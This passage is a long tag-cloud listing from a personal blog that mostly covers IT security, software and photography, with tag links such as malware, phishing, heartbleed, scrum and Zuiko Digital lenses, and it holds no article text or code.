Opfer](https://www.sorinmustaca.com/tag/kartenhaus-opfer/) - [kaspersky](https://www.sorinmustaca.com/tag/kaspersky/) - [Kaspersky Blog](https://www.sorinmustaca.com/tag/kaspersky-blog/) - [Kaspersky Internet Security](https://www.sorinmustaca.com/tag/kaspersky-internet-security/) - [king of steel](https://www.sorinmustaca.com/tag/king-of-steel/) - [Kinoma](https://www.sorinmustaca.com/tag/kinoma/) - [kinoma free play](https://www.sorinmustaca.com/tag/kinoma-free-play/) - [kleidung](https://www.sorinmustaca.com/tag/kleidung/) - [koala](https://www.sorinmustaca.com/tag/koala/) - [lan](https://www.sorinmustaca.com/tag/lan/) - [language](https://www.sorinmustaca.com/tag/language/) - [Language English Exam](https://www.sorinmustaca.com/tag/language-english-exam/) - [lastwatchdog](https://www.sorinmustaca.com/tag/lastwatchdog/) - [lean](https://www.sorinmustaca.com/tag/lean/) - [leaving](https://www.sorinmustaca.com/tag/leaving/) - [libraries](https://www.sorinmustaca.com/tag/libraries/) - [Linguistic relativity](https://www.sorinmustaca.com/tag/linguistic-relativity/) - [LinkedIn](https://www.sorinmustaca.com/tag/linkedin/) - [links digital photography](https://www.sorinmustaca.com/tag/links-digital-photography/) - [linux](https://www.sorinmustaca.com/tag/linux/) - [localserver](https://www.sorinmustaca.com/tag/localserver/) - [logitech](https://www.sorinmustaca.com/tag/logitech/) - [loreley](https://www.sorinmustaca.com/tag/loreley/) - [mac](https://www.sorinmustaca.com/tag/mac/) - [macosx](https://www.sorinmustaca.com/tag/macosx/) - [mag](https://www.sorinmustaca.com/tag/mag/) - [mageia](https://www.sorinmustaca.com/tag/mageia/) - [magic circle festival](https://www.sorinmustaca.com/tag/magic-circle-festival/) - [magic circle festival 2009](https://www.sorinmustaca.com/tag/magic-circle-festival-2009/) - [Malaysia](https://www.sorinmustaca.com/tag/malaysia/) - [malicious apps](https://www.sorinmustaca.com/tag/malicious-apps/) - [malware](https://www.sorinmustaca.com/tag/malware/) - [malware statistics](https://www.sorinmustaca.com/tag/malware-statistics/) - [managed](https://www.sorinmustaca.com/tag/managed/) - [Managed Security Services](https://www.sorinmustaca.com/tag/managed-security-services/) - [management](https://www.sorinmustaca.com/tag/management/) - [managing startups](https://www.sorinmustaca.com/tag/managing-startups/) - [mandriva](https://www.sorinmustaca.com/tag/mandriva/) - [Mano Paul](https://www.sorinmustaca.com/tag/mano-paul/) - [manowar](https://www.sorinmustaca.com/tag/manowar/) - [maps](https://www.sorinmustaca.com/tag/maps/) - [Mass Payment](https://www.sorinmustaca.com/tag/mass-payment/) - [mcafee](https://www.sorinmustaca.com/tag/mcafee/) - [media](https://www.sorinmustaca.com/tag/media/) - [mediacenter](https://www.sorinmustaca.com/tag/mediacenter/) - [meds](https://www.sorinmustaca.com/tag/meds/) - [mega pixels](https://www.sorinmustaca.com/tag/mega-pixels/) - [memory pool](https://www.sorinmustaca.com/tag/memory-pool/) - [microsoft](https://www.sorinmustaca.com/tag/microsoft/) - [Microsoft Defender](https://www.sorinmustaca.com/tag/microsoft-defender/) - [Microsoft Windows](https://www.sorinmustaca.com/tag/microsoft-windows/) - [mime](https://www.sorinmustaca.com/tag/mime/) - [mime sniffing](https://www.sorinmustaca.com/tag/mime-sniffing/) - [mime type detection](https://www.sorinmustaca.com/tag/mime-type-detection/) - [ministerul de finante](https://www.sorinmustaca.com/tag/ministerul-de-finante/) - [mitre](https://www.sorinmustaca.com/tag/mitre/) - [mobile](https://www.sorinmustaca.com/tag/mobile/) - [Most Dangerous Programming](https://www.sorinmustaca.com/tag/most-dangerous-programming/) - [mozilla](https://www.sorinmustaca.com/tag/mozilla/) - [Mozilla Firefox](https://www.sorinmustaca.com/tag/mozilla-firefox/) - [Mozilla Technologies](https://www.sorinmustaca.com/tag/mozilla-technologies/) - [MS Word](https://www.sorinmustaca.com/tag/ms-word/) - [MSN](https://www.sorinmustaca.com/tag/msn/) - [multicore](https://www.sorinmustaca.com/tag/multicore/) - [multiple processors](https://www.sorinmustaca.com/tag/multiple-processors/) - [multithreaded](https://www.sorinmustaca.com/tag/multithreaded/) - [mustaca.de](https://www.sorinmustaca.com/tag/mustaca-de/) - [mustaca.ro](https://www.sorinmustaca.com/tag/mustaca-ro/) - [myths](https://www.sorinmustaca.com/tag/myths/) - [named objects](https://www.sorinmustaca.com/tag/named-objects/) - [net tv](https://www.sorinmustaca.com/tag/net-tv/) - [netbeat](https://www.sorinmustaca.com/tag/netbeat/) - [netbook](https://www.sorinmustaca.com/tag/netbook/) - [nettv](https://www.sorinmustaca.com/tag/nettv/) - [Networked Attached Storage](https://www.sorinmustaca.com/tag/networked-attached-storage/) - [New Avira Techblog](https://www.sorinmustaca.com/tag/new-avira-techblog/) - [New Olympus](https://www.sorinmustaca.com/tag/new-olympus/) - [new york times](https://www.sorinmustaca.com/tag/new-york-times/) - [News Feed](https://www.sorinmustaca.com/tag/news-feed/) - [newsletter](https://www.sorinmustaca.com/tag/newsletter/) - [Next Next](https://www.sorinmustaca.com/tag/next-next/) - [nextfw](https://www.sorinmustaca.com/tag/nextfw/) - [Nick Fitzgerald](https://www.sorinmustaca.com/tag/nick-fitzgerald/) - [Nigerian](https://www.sorinmustaca.com/tag/nigerian/) - [nigerian scam](https://www.sorinmustaca.com/tag/nigerian-scam/) - [Nigerian Scams](https://www.sorinmustaca.com/tag/nigerian-scams/) - [nips](https://www.sorinmustaca.com/tag/nips/) - [nist](https://www.sorinmustaca.com/tag/nist/) - [NO](https://www.sorinmustaca.com/tag/no/) - [No So](https://www.sorinmustaca.com/tag/no-so/) - [notify.me](https://www.sorinmustaca.com/tag/notify-me/) - [NP](https://www.sorinmustaca.com/tag/np/) - [o2](https://www.sorinmustaca.com/tag/o2/) - [O2 Germany](https://www.sorinmustaca.com/tag/o2-germany/) - [OCR](https://www.sorinmustaca.com/tag/ocr/) - [Old Blog](https://www.sorinmustaca.com/tag/old-blog/) - [omition channelpartner](https://www.sorinmustaca.com/tag/omition-channelpartner/) - [One Package Manager](https://www.sorinmustaca.com/tag/one-package-manager/) - [online](https://www.sorinmustaca.com/tag/online/) - [online backup](https://www.sorinmustaca.com/tag/online-backup/) - [online pharmacy](https://www.sorinmustaca.com/tag/online-pharmacy/) - [Online Protection](https://www.sorinmustaca.com/tag/online-protection/) - [online storage](https://www.sorinmustaca.com/tag/online-storage/) - [onlinebackup](https://www.sorinmustaca.com/tag/onlinebackup/) - [onMouseOver()](https://www.sorinmustaca.com/tag/onmouseover/) - [openvpn](https://www.sorinmustaca.com/tag/openvpn/) - [opera](https://www.sorinmustaca.com/tag/opera/) - [opera unite](https://www.sorinmustaca.com/tag/opera-unite/) - [Opera Unite Everybody](https://www.sorinmustaca.com/tag/opera-unite-everybody/) - [operating sytem](https://www.sorinmustaca.com/tag/operating-sytem/) - [OS](https://www.sorinmustaca.com/tag/os/) - [outbreak](https://www.sorinmustaca.com/tag/outbreak/) - [Outbreak Maximum Alert](https://www.sorinmustaca.com/tag/outbreak-maximum-alert/) - [outlook](https://www.sorinmustaca.com/tag/outlook/) - [outlook web access](https://www.sorinmustaca.com/tag/outlook-web-access/) - [over capacity](https://www.sorinmustaca.com/tag/over-capacity/) - [owa](https://www.sorinmustaca.com/tag/owa/) - [p vs np](https://www.sorinmustaca.com/tag/p-vs-np/) - [page](https://www.sorinmustaca.com/tag/page/) - [Page Load Time](https://www.sorinmustaca.com/tag/page-load-time/) - [Panda Security](https://www.sorinmustaca.com/tag/panda-security/) - [password](https://www.sorinmustaca.com/tag/password/) - [password reset](https://www.sorinmustaca.com/tag/password-reset/) - [passwords](https://www.sorinmustaca.com/tag/passwords/) - [PayPal](https://www.sorinmustaca.com/tag/paypal/) - [Paypal Mutter](https://www.sorinmustaca.com/tag/paypal-mutter/) - [Paypal Phishing](https://www.sorinmustaca.com/tag/paypal-phishing/) - [PC](https://www.sorinmustaca.com/tag/pc/) - [PCH](https://www.sorinmustaca.com/tag/pch/) - [pda](https://www.sorinmustaca.com/tag/pda/) - [PDF](https://www.sorinmustaca.com/tag/pdf/) - [personal](https://www.sorinmustaca.com/tag/personal/) - [PFL](https://www.sorinmustaca.com/tag/pfl/) - [PFL8404H](https://www.sorinmustaca.com/tag/pfl8404h/) - [pgp](https://www.sorinmustaca.com/tag/pgp/) - [pharma](https://www.sorinmustaca.com/tag/pharma/) - [philips](https://www.sorinmustaca.com/tag/philips/) - [Phishers](https://www.sorinmustaca.com/tag/phishers/) - [phishing](https://www.sorinmustaca.com/tag/phishing/) - [Phishing Angriffe](https://www.sorinmustaca.com/tag/phishing-angriffe/) - [phishing police timisoara romania hackers cloning websites](https://www.sorinmustaca.com/tag/phishing-police-timisoara-romania-hackers-cloning-websites/) - [phishing techniques](https://www.sorinmustaca.com/tag/phishing-techniques/) - [phising statistics](https://www.sorinmustaca.com/tag/phising-statistics/) - [phone](https://www.sorinmustaca.com/tag/phone/) - [photoblog](https://www.sorinmustaca.com/tag/photoblog/) - [photos](https://www.sorinmustaca.com/tag/photos/) - [PHP](https://www.sorinmustaca.com/tag/php/) - [phsihing](https://www.sorinmustaca.com/tag/phsihing/) - [picasa](https://www.sorinmustaca.com/tag/picasa/) - [pictures](https://www.sorinmustaca.com/tag/pictures/) - [PIN](https://www.sorinmustaca.com/tag/pin/) - [ping.fm](https://www.sorinmustaca.com/tag/ping-fm/) - [plugins](https://www.sorinmustaca.com/tag/plugins/) - [poland](https://www.sorinmustaca.com/tag/poland/) - [Politehnica University Bucharest](https://www.sorinmustaca.com/tag/politehnica-university-bucharest/) - [poll](https://www.sorinmustaca.com/tag/poll/) - [polynomial](https://www.sorinmustaca.com/tag/polynomial/) - [popphoto](https://www.sorinmustaca.com/tag/popphoto/) - [port](https://www.sorinmustaca.com/tag/port/) - [porting](https://www.sorinmustaca.com/tag/porting/) - [post](https://www.sorinmustaca.com/tag/post/) - [postal box](https://www.sorinmustaca.com/tag/postal-box/) - [posts](https://www.sorinmustaca.com/tag/posts/) - [power of free](https://www.sorinmustaca.com/tag/power-of-free/) - [PR](https://www.sorinmustaca.com/tag/pr/) - [pranc](https://www.sorinmustaca.com/tag/pranc/) - [presentation](https://www.sorinmustaca.com/tag/presentation/) - [press release](https://www.sorinmustaca.com/tag/press-release/) - [principles](https://www.sorinmustaca.com/tag/principles/) - [private](https://www.sorinmustaca.com/tag/private/) - [pro](https://www.sorinmustaca.com/tag/pro/) - [problem](https://www.sorinmustaca.com/tag/problem/) - [product owner](https://www.sorinmustaca.com/tag/product-owner/) - [Programming](https://www.sorinmustaca.com/tag/programming/) - [project](https://www.sorinmustaca.com/tag/project/) - [project management](https://www.sorinmustaca.com/tag/project-management/) - [projecthoneypot](https://www.sorinmustaca.com/tag/projecthoneypot/) - [Protecting](https://www.sorinmustaca.com/tag/protecting/) - [protection](https://www.sorinmustaca.com/tag/protection/) - [puzzle](https://www.sorinmustaca.com/tag/puzzle/) - [puzzle globe](https://www.sorinmustaca.com/tag/puzzle-globe/) - [pvr](https://www.sorinmustaca.com/tag/pvr/) - [QR](https://www.sorinmustaca.com/tag/qr/) - [qr code](https://www.sorinmustaca.com/tag/qr-code/) - [quarantine](https://www.sorinmustaca.com/tag/quarantine/) - [quote](https://www.sorinmustaca.com/tag/quote/) - [ram](https://www.sorinmustaca.com/tag/ram/) - [Randy Abrams Thanks](https://www.sorinmustaca.com/tag/randy-abrams-thanks/) - [raspberry](https://www.sorinmustaca.com/tag/raspberry/) - [ravensburger](https://www.sorinmustaca.com/tag/ravensburger/) - [reader](https://www.sorinmustaca.com/tag/reader/) - [readwriteweb](https://www.sorinmustaca.com/tag/readwriteweb/) - [realt time protection service](https://www.sorinmustaca.com/tag/realt-time-protection-service/) - [record](https://www.sorinmustaca.com/tag/record/) - [redefinition](https://www.sorinmustaca.com/tag/redefinition/) - [redhat](https://www.sorinmustaca.com/tag/redhat/) - [refactor](https://www.sorinmustaca.com/tag/refactor/) - [Relatii Publice](https://www.sorinmustaca.com/tag/relatii-publice/) - [reliable](https://www.sorinmustaca.com/tag/reliable/) - [removal](https://www.sorinmustaca.com/tag/removal/) - [report](https://www.sorinmustaca.com/tag/report/) - [repository](https://www.sorinmustaca.com/tag/repository/) - [reposted](https://www.sorinmustaca.com/tag/reposted/) - [reputation](https://www.sorinmustaca.com/tag/reputation/) - [Required Experience](https://www.sorinmustaca.com/tag/required-experience/) - [retiring](https://www.sorinmustaca.com/tag/retiring/) - [returnare](https://www.sorinmustaca.com/tag/returnare/) - [rfid](https://www.sorinmustaca.com/tag/rfid/) - [RIM](https://www.sorinmustaca.com/tag/rim/) - [risk](https://www.sorinmustaca.com/tag/risk/) - [risk level](https://www.sorinmustaca.com/tag/risk-level/) - [robert](https://www.sorinmustaca.com/tag/robert/) - [rom upgrade](https://www.sorinmustaca.com/tag/rom-upgrade/) - [romana](https://www.sorinmustaca.com/tag/romana/) - [romania](https://www.sorinmustaca.com/tag/romania/) - [Romanian](https://www.sorinmustaca.com/tag/romanian/) - [Romanian National Police](https://www.sorinmustaca.com/tag/romanian-national-police/) - [rootkit](https://www.sorinmustaca.com/tag/rootkit/) - [RSA](https://www.sorinmustaca.com/tag/rsa/) - [RSS](https://www.sorinmustaca.com/tag/rss/) - [rss feed](https://www.sorinmustaca.com/tag/rss-feed/) - [rss feed to linkedin](https://www.sorinmustaca.com/tag/rss-feed-to-linkedin/) - [rss feed to ping.fm](https://www.sorinmustaca.com/tag/rss-feed-to-ping-fm/) - [rss feed to twitter](https://www.sorinmustaca.com/tag/rss-feed-to-twitter/) - [rss to twitter](https://www.sorinmustaca.com/tag/rss-to-twitter/) - [rsync](https://www.sorinmustaca.com/tag/rsync/) - [Ruggedization](https://www.sorinmustaca.com/tag/ruggedization/) - [SaaS](https://www.sorinmustaca.com/tag/saas/) - [safari firefox browsers](https://www.sorinmustaca.com/tag/safari-firefox-browsers/) - [safe](https://www.sorinmustaca.com/tag/safe/) - [safety](https://www.sorinmustaca.com/tag/safety/) - [Samsung NC110](https://www.sorinmustaca.com/tag/samsung-nc110/) - [sandbox](https://www.sorinmustaca.com/tag/sandbox/) - [sans](https://www.sorinmustaca.com/tag/sans/) - [Sapir-Whorf hypothesis](https://www.sorinmustaca.com/tag/sapir-whorf-hypothesis/) - [sblan2](https://www.sorinmustaca.com/tag/sblan2/) - [scam](https://www.sorinmustaca.com/tag/scam/) - [Script in the middle](https://www.sorinmustaca.com/tag/script-in-the-middle/) - [scrum](https://www.sorinmustaca.com/tag/scrum/) - [searchsecurity.de](https://www.sorinmustaca.com/tag/searchsecurity-de/) - [Security Hinweise](https://www.sorinmustaca.com/tag/security-hinweise/) - [Security News Feed](https://www.sorinmustaca.com/tag/security-news-feed/) - [semaphores](https://www.sorinmustaca.com/tag/semaphores/) - [services](https://www.sorinmustaca.com/tag/services/) - [sha](https://www.sorinmustaca.com/tag/sha/) - [sha-3](https://www.sorinmustaca.com/tag/sha-3/) - [sha3](https://www.sorinmustaca.com/tag/sha3/) - [shadowserver](https://www.sorinmustaca.com/tag/shadowserver/) - [shame](https://www.sorinmustaca.com/tag/shame/) - [Shopping Online](https://www.sorinmustaca.com/tag/shopping-online/) - [short link](https://www.sorinmustaca.com/tag/short-link/) - [sidejacking](https://www.sorinmustaca.com/tag/sidejacking/) - [Sie Ihre](https://www.sorinmustaca.com/tag/sie-ihre/) - [sigcheck](https://www.sorinmustaca.com/tag/sigcheck/) - [Signal Magazine](https://www.sorinmustaca.com/tag/signal-magazine/) - [signature](https://www.sorinmustaca.com/tag/signature/) - [signs](https://www.sorinmustaca.com/tag/signs/) - [sip](https://www.sorinmustaca.com/tag/sip/) - [site hacked phishing phishers](https://www.sorinmustaca.com/tag/site-hacked-phishing-phishers/) - [skype](https://www.sorinmustaca.com/tag/skype/) - [Skype Extras](https://www.sorinmustaca.com/tag/skype-extras/) - [SLR](https://www.sorinmustaca.com/tag/slr/) - [small businesses](https://www.sorinmustaca.com/tag/small-businesses/) - [smartphone](https://www.sorinmustaca.com/tag/smartphone/) - [sniffing](https://www.sorinmustaca.com/tag/sniffing/) - [Social Bookmarking Tab](https://www.sorinmustaca.com/tag/social-bookmarking-tab/) - [Social engineering](https://www.sorinmustaca.com/tag/social-engineering/) - [social media](https://www.sorinmustaca.com/tag/social-media/) - [soft phone voip sip software](https://www.sorinmustaca.com/tag/soft-phone-voip-sip-software/) - [software](https://www.sorinmustaca.com/tag/software/) - [Sorin Mustaca](https://www.sorinmustaca.com/tag/sorin-mustaca/) - [Spaces.Live.com](https://www.sorinmustaca.com/tag/spaces-live-com/) - [spam](https://www.sorinmustaca.com/tag/spam/) - [spam categories](https://www.sorinmustaca.com/tag/spam-categories/) - [spam phishing malware softpedia techblog](https://www.sorinmustaca.com/tag/spam-phishing-malware-softpedia-techblog/) - [spam trends](https://www.sorinmustaca.com/tag/spam-trends/) - [spammer](https://www.sorinmustaca.com/tag/spammer/) - [Spammer Compendium](https://www.sorinmustaca.com/tag/spammer-compendium/) - [Spammer Compendium tsc](https://www.sorinmustaca.com/tag/spammer-compendium-tsc/) - [spammer's compendium](https://www.sorinmustaca.com/tag/spammers-compendium/) - [spammers](https://www.sorinmustaca.com/tag/spammers/) - [spamming](https://www.sorinmustaca.com/tag/spamming/) - [Sridhar Vembu](https://www.sorinmustaca.com/tag/sridhar-vembu/) - [ssh](https://www.sorinmustaca.com/tag/ssh/) - [ssl](https://www.sorinmustaca.com/tag/ssl/) - [Start Render Time](https://www.sorinmustaca.com/tag/start-render-time/) - [startup](https://www.sorinmustaca.com/tag/startup/) - [stock spam messenger msn](https://www.sorinmustaca.com/tag/stock-spam-messenger-msn/) - [stolen passwords](https://www.sorinmustaca.com/tag/stolen-passwords/) - [storage](https://www.sorinmustaca.com/tag/storage/) - [stupid](https://www.sorinmustaca.com/tag/stupid/) - [sucks](https://www.sorinmustaca.com/tag/sucks/) - [sudo](https://www.sorinmustaca.com/tag/sudo/) - [summit](https://www.sorinmustaca.com/tag/summit/) - [sun](https://www.sorinmustaca.com/tag/sun/) - [Sun Shame](https://www.sorinmustaca.com/tag/sun-shame/) - [sunset](https://www.sorinmustaca.com/tag/sunset/) - [support](https://www.sorinmustaca.com/tag/support/) - [Surfers](https://www.sorinmustaca.com/tag/surfers/) - [suse](https://www.sorinmustaca.com/tag/suse/) - [Suspicious](https://www.sorinmustaca.com/tag/suspicious/) - [symantec](https://www.sorinmustaca.com/tag/symantec/) - [symlink](https://www.sorinmustaca.com/tag/symlink/) - [synchronization](https://www.sorinmustaca.com/tag/synchronization/) - [sys-201](https://www.sorinmustaca.com/tag/sys-201/) - [TAB](https://www.sorinmustaca.com/tag/tab/) - [tag](https://www.sorinmustaca.com/tag/tag/) - [tarom](https://www.sorinmustaca.com/tag/tarom/) - [tata](https://www.sorinmustaca.com/tag/tata/) - [Tata Father](https://www.sorinmustaca.com/tag/tata-father/) - [teach malware](https://www.sorinmustaca.com/tag/teach-malware/) - [Techblog](https://www.sorinmustaca.com/tag/techblog/) - [Techblog Amazing Avira](https://www.sorinmustaca.com/tag/techblog-amazing-avira/) - [TechNewsWorld](https://www.sorinmustaca.com/tag/technewsworld/) - [technewsworld.com](https://www.sorinmustaca.com/tag/technewsworld-com/) - [test file](https://www.sorinmustaca.com/tag/test-file/) - [testing](https://www.sorinmustaca.com/tag/testing/) - [the most vulnerable](https://www.sorinmustaca.com/tag/the-most-vulnerable/) - [the spammers compendium](https://www.sorinmustaca.com/tag/the-spammers-compendium/) - [threat](https://www.sorinmustaca.com/tag/threat/) - [threat level](https://www.sorinmustaca.com/tag/threat-level/) - [threatcon](https://www.sorinmustaca.com/tag/threatcon/) - [threats](https://www.sorinmustaca.com/tag/threats/) - [TIMISOARA](https://www.sorinmustaca.com/tag/timisoara/) - [tips](https://www.sorinmustaca.com/tag/tips/) - [toolbar](https://www.sorinmustaca.com/tag/toolbar/) - [tools](https://www.sorinmustaca.com/tag/tools/) - [top](https://www.sorinmustaca.com/tag/top/) - [Top 25](https://www.sorinmustaca.com/tag/top-25/) - [touch](https://www.sorinmustaca.com/tag/touch/) - [touch hd htc](https://www.sorinmustaca.com/tag/touch-hd-htc/) - [tsc](https://www.sorinmustaca.com/tag/tsc/) - [tunnel](https://www.sorinmustaca.com/tag/tunnel/) - [tv](https://www.sorinmustaca.com/tag/tv/) - [twitter](https://www.sorinmustaca.com/tag/twitter/) - [Twitter Spam](https://www.sorinmustaca.com/tag/twitter-spam/) - [Twitterfeed](https://www.sorinmustaca.com/tag/twitterfeed/) - [twitterfeed.com](https://www.sorinmustaca.com/tag/twitterfeed-com/) - [two-factor](https://www.sorinmustaca.com/tag/two-factor/) - [twotterfeed](https://www.sorinmustaca.com/tag/twotterfeed/) - [ubuntu](https://www.sorinmustaca.com/tag/ubuntu/) - [Ubuntu Desktop](https://www.sorinmustaca.com/tag/ubuntu-desktop/) - [UI](https://www.sorinmustaca.com/tag/ui/) - [UK](https://www.sorinmustaca.com/tag/uk/) - [uninstall](https://www.sorinmustaca.com/tag/uninstall/) - [universal package manager](https://www.sorinmustaca.com/tag/universal-package-manager/) - [unlimited storage](https://www.sorinmustaca.com/tag/unlimited-storage/) - [Until January](https://www.sorinmustaca.com/tag/until-january/) - [update](https://www.sorinmustaca.com/tag/update/) - [updates](https://www.sorinmustaca.com/tag/updates/) - [URL](https://www.sorinmustaca.com/tag/url/) - [URL Shorteners](https://www.sorinmustaca.com/tag/url-shorteners/) - [URLCheck](https://www.sorinmustaca.com/tag/urlcheck/) - [US](https://www.sorinmustaca.com/tag/us/) - [usa today](https://www.sorinmustaca.com/tag/usa-today/) - [USB](https://www.sorinmustaca.com/tag/usb/) - [vb](https://www.sorinmustaca.com/tag/vb/) - [vc++](https://www.sorinmustaca.com/tag/vc/) - [vc++ 2010](https://www.sorinmustaca.com/tag/vc-2010/) - [VCBuild](https://www.sorinmustaca.com/tag/vcbuild/) - [VCPROJ](https://www.sorinmustaca.com/tag/vcproj/) - [verification](https://www.sorinmustaca.com/tag/verification/) - [verisign](https://www.sorinmustaca.com/tag/verisign/) - [viagra](https://www.sorinmustaca.com/tag/viagra/) - [video](https://www.sorinmustaca.com/tag/video/) - [Viele Internet Nutzer](https://www.sorinmustaca.com/tag/viele-internet-nutzer/) - [virtual post stamp](https://www.sorinmustaca.com/tag/virtual-post-stamp/) - [virus](https://www.sorinmustaca.com/tag/virus/) - [virus bulletin](https://www.sorinmustaca.com/tag/virus-bulletin/) - [virus bulletin conference 2009](https://www.sorinmustaca.com/tag/virus-bulletin-conference-2009/) - [Virus Bulletin Magazine](https://www.sorinmustaca.com/tag/virus-bulletin-magazine/) - [viruses](https://www.sorinmustaca.com/tag/viruses/) - [visa lottery scam](https://www.sorinmustaca.com/tag/visa-lottery-scam/) - [vista 7](https://www.sorinmustaca.com/tag/vista-7/) - [Visual C++](https://www.sorinmustaca.com/tag/visual-c/) - [visual studio](https://www.sorinmustaca.com/tag/visual-studio/) - [Visual Studio 2010](https://www.sorinmustaca.com/tag/visual-studio-2010/) - [voip](https://www.sorinmustaca.com/tag/voip/) - [VSTUDIO](https://www.sorinmustaca.com/tag/vstudio/) - [vstudio 2010](https://www.sorinmustaca.com/tag/vstudio-2010/) - [vulnerability](https://www.sorinmustaca.com/tag/vulnerability/) - [Wachovia Bank](https://www.sorinmustaca.com/tag/wachovia-bank/) - [Wall Street](https://www.sorinmustaca.com/tag/wall-street/) - [war](https://www.sorinmustaca.com/tag/war/) - [warning](https://www.sorinmustaca.com/tag/warning/) - [wave](https://www.sorinmustaca.com/tag/wave/) - [Web](https://www.sorinmustaca.com/tag/web/) - [Web exploits](https://www.sorinmustaca.com/tag/web-exploits/) - [webcam](https://www.sorinmustaca.com/tag/webcam/) - [website](https://www.sorinmustaca.com/tag/website/) - [websites](https://www.sorinmustaca.com/tag/websites/) - [What's New in Visual C++ 2010](https://www.sorinmustaca.com/tag/whats-new-in-visual-c-2010/) - [whitepaper](https://www.sorinmustaca.com/tag/whitepaper/) - [wi-fi](https://www.sorinmustaca.com/tag/wi-fi/) - [windows](https://www.sorinmustaca.com/tag/windows/) - [Windows Defender](https://www.sorinmustaca.com/tag/windows-defender/) - [windows mobile](https://www.sorinmustaca.com/tag/windows-mobile/) - [Windows Update](https://www.sorinmustaca.com/tag/windows-update/) - [WM](https://www.sorinmustaca.com/tag/wm/) - [wordpress](https://www.sorinmustaca.com/tag/wordpress/) - [words](https://www.sorinmustaca.com/tag/words/) - [WOW](https://www.sorinmustaca.com/tag/wow/) - [wp.me](https://www.sorinmustaca.com/tag/wp-me/) - [writing](https://www.sorinmustaca.com/tag/writing/) - [WTF](https://www.sorinmustaca.com/tag/wtf/) - [XLS](https://www.sorinmustaca.com/tag/xls/) - [yahoo](https://www.sorinmustaca.com/tag/yahoo/) - [YES](https://www.sorinmustaca.com/tag/yes/) - [youtube](https://www.sorinmustaca.com/tag/youtube/) - [zero-day](https://www.sorinmustaca.com/tag/zero-day/) - [ZIP](https://www.sorinmustaca.com/tag/zip/) - [zoom](https://www.sorinmustaca.com/tag/zoom/) - [zotac](https://www.sorinmustaca.com/tag/zotac/) - [Zuiko Digital](https://www.sorinmustaca.com/tag/zuiko-digital/) - [Zuiko Digital Lenses](https://www.sorinmustaca.com/tag/zuiko-digital-lenses/) - [bitcasa](https://www.sorinmustaca.com/tag/bitcasa/) - [failure](https://www.sorinmustaca.com/tag/failure/) - [quota](https://www.sorinmustaca.com/tag/quota/) - [over](https://www.sorinmustaca.com/tag/over/) - [infinite](https://www.sorinmustaca.com/tag/infinite/) - [cyberattacks](https://www.sorinmustaca.com/tag/cyberattacks/) - [cyber attacks](https://www.sorinmustaca.com/tag/cyber-attacks/) - [awareness](https://www.sorinmustaca.com/tag/awareness/) - [smb](https://www.sorinmustaca.com/tag/smb/) - [samba](https://www.sorinmustaca.com/tag/samba/) - [mount](https://www.sorinmustaca.com/tag/mount/) - [share](https://www.sorinmustaca.com/tag/share/) - [raspberrypi](https://www.sorinmustaca.com/tag/raspberrypi/) - [fstab](https://www.sorinmustaca.com/tag/fstab/) - [Adotas.com](https://www.sorinmustaca.com/tag/adotas-com/) - [Improve Your SecurityImprove Your Security](https://www.sorinmustaca.com/tag/improve-your-securityimprove-your-security/) - [graham cluley](https://www.sorinmustaca.com/tag/graham-cluley/) - [tracking](https://www.sorinmustaca.com/tag/tracking/) - [cookies](https://www.sorinmustaca.com/tag/cookies/) - [browsers](https://www.sorinmustaca.com/tag/browsers/) - [do not track](https://www.sorinmustaca.com/tag/do-not-track/) - [ads](https://www.sorinmustaca.com/tag/ads/) - [business](https://www.sorinmustaca.com/tag/business/) - [enterprise](https://www.sorinmustaca.com/tag/enterprise/) - [users](https://www.sorinmustaca.com/tag/users/) - [computers](https://www.sorinmustaca.com/tag/computers/) - [encryption](https://www.sorinmustaca.com/tag/encryption/) - [anti-nsa](https://www.sorinmustaca.com/tag/anti-nsa/) - [nsa](https://www.sorinmustaca.com/tag/nsa/) - [surveillance](https://www.sorinmustaca.com/tag/surveillance/) - [computerweekly](https://www.sorinmustaca.com/tag/computerweekly/) - [technewworld](https://www.sorinmustaca.com/tag/technewworld/) - [IoC](https://www.sorinmustaca.com/tag/ioc/) - [internet of things](https://www.sorinmustaca.com/tag/internet-of-things/) - [proofpoint](https://www.sorinmustaca.com/tag/proofpoint/) - [fridge](https://www.sorinmustaca.com/tag/fridge/) - [fail](https://www.sorinmustaca.com/tag/fail/) - [fans](https://www.sorinmustaca.com/tag/fans/) - [ectnews](https://www.sorinmustaca.com/tag/ectnews/) - [ect](https://www.sorinmustaca.com/tag/ect/) - [retail](https://www.sorinmustaca.com/tag/retail/) - [target](https://www.sorinmustaca.com/tag/target/) - [thoughts](https://www.sorinmustaca.com/tag/thoughts/) - [internet bubble](https://www.sorinmustaca.com/tag/internet-bubble/) - [whatsapp](https://www.sorinmustaca.com/tag/whatsapp/) - [dotcom](https://www.sorinmustaca.com/tag/dotcom/) - [forbes.com](https://www.sorinmustaca.com/tag/forbes-com/) - [byoi](https://www.sorinmustaca.com/tag/byoi/) - [byod](https://www.sorinmustaca.com/tag/byod/) - [identity](https://www.sorinmustaca.com/tag/identity/) - [device](https://www.sorinmustaca.com/tag/device/) - [own](https://www.sorinmustaca.com/tag/own/) - [bring](https://www.sorinmustaca.com/tag/bring/) - [your](https://www.sorinmustaca.com/tag/your/) - [goto](https://www.sorinmustaca.com/tag/goto/) - [bad practice](https://www.sorinmustaca.com/tag/bad-practice/) - [ips](https://www.sorinmustaca.com/tag/ips/) - [application firewall](https://www.sorinmustaca.com/tag/application-firewall/) - [functional requirements](https://www.sorinmustaca.com/tag/functional-requirements/) - [non-functional requirements](https://www.sorinmustaca.com/tag/non-functional-requirements/) - [schwaebische](https://www.sorinmustaca.com/tag/schwaebische/) - [zeitung](https://www.sorinmustaca.com/tag/zeitung/) - [dell](https://www.sorinmustaca.com/tag/dell/) - [xp](https://www.sorinmustaca.com/tag/xp/) - [migration](https://www.sorinmustaca.com/tag/migration/) - [heartbleed](https://www.sorinmustaca.com/tag/heartbleed/) - [techpageone](https://www.sorinmustaca.com/tag/techpageone/) - [two-factor authentication](https://www.sorinmustaca.com/tag/two-factor-authentication/) - [linuxinsider](https://www.sorinmustaca.com/tag/linuxinsider/) - [dead](https://www.sorinmustaca.com/tag/dead/) - [password change](https://www.sorinmustaca.com/tag/password-change/) - [forbes](https://www.sorinmustaca.com/tag/forbes/) - [hack](https://www.sorinmustaca.com/tag/hack/) - [attempt](https://www.sorinmustaca.com/tag/attempt/) - [credit card](https://www.sorinmustaca.com/tag/credit-card/) - [data breach](https://www.sorinmustaca.com/tag/data-breach/) - [securityweek](https://www.sorinmustaca.com/tag/securityweek/) - [spotify](https://www.sorinmustaca.com/tag/spotify/) - 